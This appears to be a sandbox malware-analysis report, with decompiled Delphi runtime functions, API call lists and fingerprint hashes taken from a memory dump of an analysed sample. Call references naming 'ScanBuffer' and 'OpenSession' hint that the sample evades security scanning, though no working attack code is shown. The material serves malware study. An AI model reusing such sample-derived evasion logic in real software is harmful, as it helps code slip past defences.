                                                                                                				_push(":mm:ss");
                                                                                                				_push(_v16);
                                                                                                				E02174C24();
                                                                                                				 *0x21938d2 = E0217AA04(_t132, 0x2c, 0xc);
                                                                                                				_pop(_t183);
                                                                                                				 *[fs:eax] = _t183;
                                                                                                				_push(E0217C23E);
                                                                                                				return E021748C4( &_v68, 0x10);
                                                                                                			}

























                                                                                                0x0217c1f2
                                                                                                0x0217c1f7
                                                                                                0x0217c204
                                                                                                0x0217c217
                                                                                                0x0217c21e
                                                                                                0x0217c221
                                                                                                0x0217c224
                                                                                                0x0217c236

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(00000000,0217C237,?,?,00000000,00000000), ref: 0217BFA2
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread
                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                • API String ID: 4232894706-2493093252
                                                                                                • Opcode ID: 33131ff53440417b6627cdd2c63705541fc03b87fb7440469880bf47a6a99a8d
                                                                                                • Instruction ID: 2bbf33a53e0f14cfe0bd0cf17cc5d36d7c440846ccbe9ab3a703576bfe0f1793
                                                                                                • Opcode Fuzzy Hash: 33131ff53440417b6627cdd2c63705541fc03b87fb7440469880bf47a6a99a8d
                                                                                                • Instruction Fuzzy Hash: DD610E30BC02889FDB00EBE8D940A9FB7B7AFD9700F909576A111AB745DB34DE558B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E0217E5DC(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                                                                				char _v260;
                                                                                                				char _v768;
                                                                                                				char _v772;
                                                                                                				short* _v776;
                                                                                                				intOrPtr _v780;
                                                                                                				char _v784;
                                                                                                				signed int _v788;
                                                                                                				signed short* _v792;
                                                                                                				char _v796;
                                                                                                				char _v800;
                                                                                                				intOrPtr* _v804;
                                                                                                				void* __ebp;
                                                                                                				signed char _t47;
                                                                                                				signed int _t54;
                                                                                                				void* _t62;
                                                                                                				intOrPtr* _t73;
                                                                                                				signed short* _t91;
                                                                                                				void* _t93;
                                                                                                				void* _t95;
                                                                                                				void* _t98;
                                                                                                				void* _t99;
                                                                                                				intOrPtr* _t108;
                                                                                                				void* _t112;
                                                                                                				intOrPtr _t113;
                                                                                                				char* _t114;
                                                                                                				void* _t115;
                                                                                                
                                                                                                				_t100 = __ecx;
                                                                                                				_v780 = __ecx;
                                                                                                				_t91 = __edx;
                                                                                                				_v776 = __eax;
                                                                                                				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                					E0217E21C(0x80070057);
                                                                                                				}
                                                                                                				_t47 =  *_t91 & 0x0000ffff;
                                                                                                				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                					_push(_t91);
                                                                                                					_push(_v776);
                                                                                                					L0217CFDC();
                                                                                                					return E0217E21C(_v776);
                                                                                                				} else {
                                                                                                					if((_t47 & 0x00000040) == 0) {
                                                                                                						_v792 = _t91[4];
                                                                                                					} else {
                                                                                                						_v792 =  *(_t91[4]);
                                                                                                					}
                                                                                                					_v788 =  *_v792 & 0x0000ffff;
                                                                                                					_t93 = _v788 - 1;
                                                                                                					if(_t93 < 0) {
                                                                                                						L9:
                                                                                                						_push( &_v772);
                                                                                                						_t54 = _v788;
                                                                                                						_push(_t54);
                                                                                                						_push(0xc);
                                                                                                						L0217D434();
                                                                                                						_t113 = _t54;
                                                                                                						if(_t113 == 0) {
                                                                                                							E0217DF74(_t100);
                                                                                                						}
                                                                                                						E0217E534(_v776);
                                                                                                						 *_v776 = 0x200c;
                                                                                                						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                						_t95 = _v788 - 1;
                                                                                                						if(_t95 < 0) {
                                                                                                							L14:
                                                                                                							_t97 = _v788 - 1;
                                                                                                							if(E0217E550(_v788 - 1, _t115) != 0) {
                                                                                                								L0217D44C();
                                                                                                								E0217E21C(_v792);
                                                                                                								L0217D44C();
                                                                                                								E0217E21C( &_v260);
                                                                                                								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                							}
                                                                                                							_t62 = E0217E580(_t97, _t115);
                                                                                                						} else {
                                                                                                							_t98 = _t95 + 1;
                                                                                                							_t73 =  &_v768;
                                                                                                							_t108 =  &_v260;
                                                                                                							do {
                                                                                                								 *_t108 =  *_t73;
                                                                                                								_t108 = _t108 + 4;
                                                                                                								_t73 = _t73 + 8;
                                                                                                								_t98 = _t98 - 1;
                                                                                                							} while (_t98 != 0);
                                                                                                							do {
                                                                                                								goto L14;
                                                                                                							} while (_t62 != 0);
                                                                                                							return _t62;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t99 = _t93 + 1;
                                                                                                						_t112 = 0;
                                                                                                						_t114 =  &_v772;
                                                                                                						do {
                                                                                                							_v804 = _t114;
                                                                                                							_push(_v804 + 4);
                                                                                                							_t18 = _t112 + 1; // 0x1
                                                                                                							_push(_v792);
                                                                                                							L0217D43C();
                                                                                                							E0217E21C(_v792);
                                                                                                							_push( &_v784);
                                                                                                							_t21 = _t112 + 1; // 0x1
                                                                                                							_push(_v792);
                                                                                                							L0217D444();
                                                                                                							E0217E21C(_v792);
                                                                                                							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                							_t112 = _t112 + 1;
                                                                                                							_t114 = _t114 + 8;
                                                                                                							_t99 = _t99 - 1;
                                                                                                						} while (_t99 != 0);
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                			}






























                                                                                                APIs
                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0217E675
                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0217E691
                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0217E6CA
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0217E747
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0217E760
                                                                                                • VariantCopy.OLEAUT32(?), ref: 0217E795
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                • String ID:
                                                                                                • API String ID: 351091851-3916222277
                                                                                                • Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                                                • Instruction ID: 5ee6f9574b613ecfb75ac3448ea7e47deeedfef247eeb41632f8dff0113d2b1a
                                                                                                • Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                                                • Instruction Fuzzy Hash: 4B51C77598062D9FCB26DB58C880BD9B3FDAF88304F4441E5E609E7211DB70AF858FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E02174720(void* __ecx) {
                                                                                                				long _v4;
                                                                                                				int _t3;
                                                                                                
                                                                                                				if( *0x2191044 == 0) {
                                                                                                					if( *0x2190030 == 0) {
                                                                                                						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                					}
                                                                                                					return _t3;
                                                                                                				} else {
                                                                                                					if( *0x2191218 == 0xd7b2 &&  *0x2191220 > 0) {
                                                                                                						 *0x2191230();
                                                                                                					}
                                                                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                					return WriteFile(GetStdHandle(0xfffffff5), E021747A8, 2,  &_v4, 0);
                                                                                                				}
                                                                                                			}






                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0,?,?,021907CC,021767FD,0218F2B5), ref: 02174759
                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0,?,?,021907CC,021767FD,0218F2B5), ref: 0217475F
                                                                                                • GetStdHandle.KERNEL32(000000F5,021747A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0), ref: 02174774
                                                                                                • WriteFile.KERNEL32(00000000,000000F5,021747A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?), ref: 0217477A
                                                                                                • MessageBoxA.USER32 ref: 02174798
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHandleWrite$Message
                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                • API String ID: 1570097196-2970929446
                                                                                                • Opcode ID: b6068a841df7d51e292d7f601f2ff33c9e8abc579706f4a6bf48621c239bc268
                                                                                                • Instruction ID: 06a8df8170a065832022353ee7f1847046986ac8da2c1b821dc5a67f05909f52
                                                                                                • Opcode Fuzzy Hash: b6068a841df7d51e292d7f601f2ff33c9e8abc579706f4a6bf48621c239bc268
                                                                                                • Instruction Fuzzy Hash: 13F0BB71AC03453CFB10B2749D86F5A23BC57C6F61F644B09F55CE90C0C7B050C08A25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02172EC8(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
                                                                                                				CHAR* _t23;
                                                                                                				CHAR* _t24;
                                                                                                				CHAR* _t29;
                                                                                                				CHAR* _t30;
                                                                                                				CHAR* _t31;
                                                                                                				CHAR* _t32;
                                                                                                				intOrPtr* _t33;
                                                                                                				void* _t34;
                                                                                                				void* _t35;
                                                                                                				intOrPtr _t36;
                                                                                                				CHAR** _t37;
                                                                                                
                                                                                                				_t33 = __edx;
                                                                                                				_t23 = __eax;
                                                                                                				L2:
                                                                                                				while(1) {
                                                                                                					if( *_t23 != 0 &&  *_t23 <= 0x20) {
                                                                                                						_t23 = CharNextA(_t23);
                                                                                                						continue;
                                                                                                					}
                                                                                                					if( *_t23 != 0x22 || _t23[1] != 0x22) {
                                                                                                						_t35 = 0;
                                                                                                						 *_t37 = _t23;
                                                                                                						while( *_t23 > 0x20) {
                                                                                                							if( *_t23 != 0x22) {
                                                                                                								_t29 = CharNextA(_t23);
                                                                                                								_t35 = _t35 + _t29 - _t23;
                                                                                                								_t23 = _t29;
                                                                                                								continue;
                                                                                                							}
                                                                                                							_t23 = CharNextA(_t23);
                                                                                                							while( *_t23 != 0 &&  *_t23 != 0x22) {
                                                                                                								_t32 = CharNextA(_t23);
                                                                                                								_t35 = _t35 + _t32 - _t23;
                                                                                                								_t23 = _t32;
                                                                                                							}
                                                                                                							if( *_t23 != 0) {
                                                                                                								_t23 = CharNextA(_t23);
                                                                                                							}
                                                                                                						}
                                                                                                						E02174F90(_t33, _t35);
                                                                                                						_t24 =  *_t37;
                                                                                                						_t36 =  *_t33;
                                                                                                						_t34 = 0;
                                                                                                						while( *_t24 > 0x20) {
                                                                                                							if( *_t24 != 0x22) {
                                                                                                								_t30 = CharNextA(_t24);
                                                                                                								if(_t30 <= _t24) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L27;
                                                                                                								}
                                                                                                								do {
                                                                                                									L27:
                                                                                                									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                                                                                									_t24 =  &(_t24[1]);
                                                                                                									_t34 = _t34 + 1;
                                                                                                								} while (_t30 > _t24);
                                                                                                								continue;
                                                                                                							}
                                                                                                							_t24 = CharNextA(_t24);
                                                                                                							while( *_t24 != 0 &&  *_t24 != 0x22) {
                                                                                                								_t31 = CharNextA(_t24);
                                                                                                								if(_t31 <= _t24) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								do {
                                                                                                									L21:
                                                                                                									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                                                                                									_t24 =  &(_t24[1]);
                                                                                                									_t34 = _t34 + 1;
                                                                                                								} while (_t31 > _t24);
                                                                                                							}
                                                                                                							if( *_t24 != 0) {
                                                                                                								_t24 = CharNextA(_t24);
                                                                                                							}
                                                                                                						}
                                                                                                						return _t24;
                                                                                                					} else {
                                                                                                						_t23 =  &(_t23[2]);
                                                                                                						continue;
                                                                                                					}
                                                                                                				}
                                                                                                			}















                                                                                                APIs
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize), ref: 02172F02
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F0C
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F2B
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize), ref: 02172F35
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F61
                                                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession), ref: 02172F6B
                                                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession), ref: 02172F93
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext
                                                                                                • String ID:
                                                                                                • API String ID: 3213498283-0
                                                                                                • Opcode ID: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
                                                                                                • Instruction ID: 9b52fab1221446e754a4dcbbb86e5f326cf6fd4c2ca6f16ddef32bf80354b3f9
                                                                                                • Opcode Fuzzy Hash: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
                                                                                                • Instruction Fuzzy Hash: D1318891ACC3E13EEB362A788CC472A6EF54BCE254F1908A5DD968B247D7B84843C751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217B0B8(void* __edx, void* __edi, void* __fp0) {
                                                                                                				void _v1024;
                                                                                                				char _v1088;
                                                                                                				long _v1092;
                                                                                                				void* _t12;
                                                                                                				char* _t14;
                                                                                                				intOrPtr _t16;
                                                                                                				intOrPtr _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				long _t32;
                                                                                                
                                                                                                				E0217AF30(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                                                				_t14 =  *0x2190e70; // 0x2191044
                                                                                                				if( *_t14 == 0) {
                                                                                                					_t16 =  *0x2190d6c; // 0x2176b54
                                                                                                					_t9 = _t16 + 4; // 0xffe9
                                                                                                					_t18 =  *0x21937f0; // 0x2170000
                                                                                                					LoadStringA(E02175AF0(_t18),  *_t9,  &_v1088, 0x40);
                                                                                                					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                                				}
                                                                                                				_t24 =  *0x2190d90; // 0x2191214
                                                                                                				E02172D28(E021733B0(_t24));
                                                                                                				CharToOemA( &_v1024,  &_v1024);
                                                                                                				_t32 = E021782CC( &_v1024, __edi);
                                                                                                				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                                                				return WriteFile(GetStdHandle(0xfffffff4), 0x217b17c, 2,  &_v1092, 0);
                                                                                                			}













                                                                                                APIs
                                                                                                  • Part of subcall function 0217AF30: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                  • Part of subcall function 0217AF30: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                  • Part of subcall function 0217AF30: GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                  • Part of subcall function 0217AF30: LoadStringA.USER32 ref: 0217B022
                                                                                                • CharToOemA.USER32 ref: 0217B0EF
                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0217B10C
                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B112
                                                                                                • GetStdHandle.KERNEL32(000000F4,0217B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B127
                                                                                                • WriteFile.KERNEL32(00000000,000000F4,0217B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B12D
                                                                                                • LoadStringA.USER32 ref: 0217B14F
                                                                                                • MessageBoxA.USER32 ref: 0217B165
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 185507032-0
                                                                                                • Opcode ID: e13cc8b2bdb54517b39d38ac915fe1554f3caaf4808efd80a2e10f71ec6e171c
                                                                                                • Instruction ID: d7d213a4feb0c109524bf4cd0c3b645aaaae2452c5600171b484536d9128766d
                                                                                                • Opcode Fuzzy Hash: e13cc8b2bdb54517b39d38ac915fe1554f3caaf4808efd80a2e10f71ec6e171c
                                                                                                • Instruction Fuzzy Hash: E6117CB25D8240BED204EBA4CC81F9B77FEABC5310F404926B755D60E0DB72E9448F62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E02188A2E(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                				struct _STARTUPINFOA _v72;
                                                                                                				struct _PROCESS_INFORMATION _v88;
                                                                                                				char _v344;
                                                                                                				char _v348;
                                                                                                				char _v352;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				char _v364;
                                                                                                				char _v368;
                                                                                                				CHAR* _t49;
                                                                                                				int _t54;
                                                                                                				void* _t67;
                                                                                                				intOrPtr _t83;
                                                                                                				short _t86;
                                                                                                				void* _t88;
                                                                                                				void* _t91;
                                                                                                
                                                                                                				_t93 = __eflags;
                                                                                                				_v360 = 0;
                                                                                                				_v368 = 0;
                                                                                                				_v364 = 0;
                                                                                                				_v348 = 0;
                                                                                                				_v352 = 0;
                                                                                                				_v356 = 0;
                                                                                                				_t86 = __ecx;
                                                                                                				_t88 = __edx;
                                                                                                				_t67 = __eax;
                                                                                                				_push(_t91);
                                                                                                				_push(0x2188b94);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t91 + 0xfffffe94;
                                                                                                				_push(0x2188bac);
                                                                                                				E02174B04( &_v352, __eax, __eflags);
                                                                                                				_push(_v352);
                                                                                                				_push(0x2188bb8);
                                                                                                				E02174B04( &_v356, _t88, __eflags);
                                                                                                				_push(_v356);
                                                                                                				E02174C24();
                                                                                                				E02174B3C( &_v344, 0xff, _v348);
                                                                                                				E02173518( &_v72, 0x44);
                                                                                                				_v72.cb = 0x44;
                                                                                                				_v72.dwFlags = 1;
                                                                                                				_v72.wShowWindow = _t86;
                                                                                                				E02174B04( &_v364, _t67, _t93);
                                                                                                				E02178194(_v364,  &_v360);
                                                                                                				_t49 = E02174D64(_v360);
                                                                                                				E02174B04( &_v368,  &_v344, _t93);
                                                                                                				_t54 = CreateProcessA(0, E02174D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
                                                                                                				asm("sbb eax, eax");
                                                                                                				if(_t54 + 1 != 0) {
                                                                                                					WaitForSingleObject(_v88.hProcess, 0xffffffff);
                                                                                                					CloseHandle(_v88);
                                                                                                					CloseHandle(_v88.hThread);
                                                                                                				}
                                                                                                				_pop(_t83);
                                                                                                				 *[fs:eax] = _t83;
                                                                                                				_push(E02188B9B);
                                                                                                				return E021748C4( &_v368, 6);
                                                                                                			}




















                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                • String ID: D
                                                                                                • API String ID: 2059082233-2746444292
                                                                                                • Opcode ID: 53410cf5dce36f61f7772820ab92089b2dfbe405d3d48010be5b7fbaa019439b
                                                                                                • Instruction ID: 495cc74e86f05bc4201efbd2c4b653fe37919b2d0353b804a15d55f4dc40b27f
                                                                                                • Opcode Fuzzy Hash: 53410cf5dce36f61f7772820ab92089b2dfbe405d3d48010be5b7fbaa019439b
                                                                                                • Instruction Fuzzy Hash: 45315D70A8075C9FDB30EFA4CC81BDEB7BAEB89300F9041A5A508A7240DB759E85CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E02188A30(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                				struct _STARTUPINFOA _v72;
                                                                                                				struct _PROCESS_INFORMATION _v88;
                                                                                                				char _v344;
                                                                                                				char _v348;
                                                                                                				char _v352;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				char _v364;
                                                                                                				char _v368;
                                                                                                				CHAR* _t49;
                                                                                                				int _t54;
                                                                                                				void* _t67;
                                                                                                				intOrPtr _t83;
                                                                                                				short _t86;
                                                                                                				void* _t88;
                                                                                                				void* _t91;
                                                                                                
                                                                                                				_t93 = __eflags;
                                                                                                				_v360 = 0;
                                                                                                				_v368 = 0;
                                                                                                				_v364 = 0;
                                                                                                				_v348 = 0;
                                                                                                				_v352 = 0;
                                                                                                				_v356 = 0;
                                                                                                				_t86 = __ecx;
                                                                                                				_t88 = __edx;
                                                                                                				_t67 = __eax;
                                                                                                				_push(_t91);
                                                                                                				_push(0x2188b94);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t91 + 0xfffffe94;
                                                                                                				_push(0x2188bac);
                                                                                                				E02174B04( &_v352, __eax, __eflags);
                                                                                                				_push(_v352);
                                                                                                				_push(0x2188bb8);
                                                                                                				E02174B04( &_v356, _t88, __eflags);
                                                                                                				_push(_v356);
                                                                                                				E02174C24();
                                                                                                				E02174B3C( &_v344, 0xff, _v348);
                                                                                                				E02173518( &_v72, 0x44);
                                                                                                				_v72.cb = 0x44;
                                                                                                				_v72.dwFlags = 1;
                                                                                                				_v72.wShowWindow = _t86;
                                                                                                				E02174B04( &_v364, _t67, _t93);
                                                                                                				E02178194(_v364,  &_v360);
                                                                                                				_t49 = E02174D64(_v360);
                                                                                                				E02174B04( &_v368,  &_v344, _t93);
                                                                                                				_t54 = CreateProcessA(0, E02174D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
                                                                                                				asm("sbb eax, eax");
                                                                                                				if(_t54 + 1 != 0) {
                                                                                                					WaitForSingleObject(_v88.hProcess, 0xffffffff);
                                                                                                					CloseHandle(_v88);
                                                                                                					CloseHandle(_v88.hThread);
                                                                                                				}
                                                                                                				_pop(_t83);
                                                                                                				 *[fs:eax] = _t83;
                                                                                                				_push(E02188B9B);
                                                                                                				return E021748C4( &_v368, 6);
                                                                                                			}




















                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                • String ID: D
                                                                                                • API String ID: 2059082233-2746444292
                                                                                                • Opcode ID: 8358bb58bf31a50f1552eea3acb1fd6e6977d88bce9fe78ef568f298f0691c61
                                                                                                • Instruction ID: 08f53d3e5793c618cc682cadaea3b485d8a3c7df8cb459659caee41b81a33bd5
                                                                                                • Opcode Fuzzy Hash: 8358bb58bf31a50f1552eea3acb1fd6e6977d88bce9fe78ef568f298f0691c61
                                                                                                • Instruction Fuzzy Hash: 5B315D70A8075C9FDB30EF94CC81BDEB7BAEB89300F9041A5A508A7240DB759E85CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E02173B00() {
                                                                                                				void* _v8;
                                                                                                				char _v12;
                                                                                                				int _v16;
                                                                                                				signed short _t14;
                                                                                                				intOrPtr _t27;
                                                                                                				void* _t29;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t32;
                                                                                                
                                                                                                				_t29 = _t31;
                                                                                                				_t32 = _t31 + 0xfffffff4;
                                                                                                				_v12 =  *0x2190024 & 0x0000ffff;
                                                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                					_t14 =  *0x2190024 & 0xffc0 | _v12 & 0x3f;
                                                                                                					 *0x2190024 = _t14;
                                                                                                					return _t14;
                                                                                                				} else {
                                                                                                					_push(_t29);
                                                                                                					_push(E02173B71);
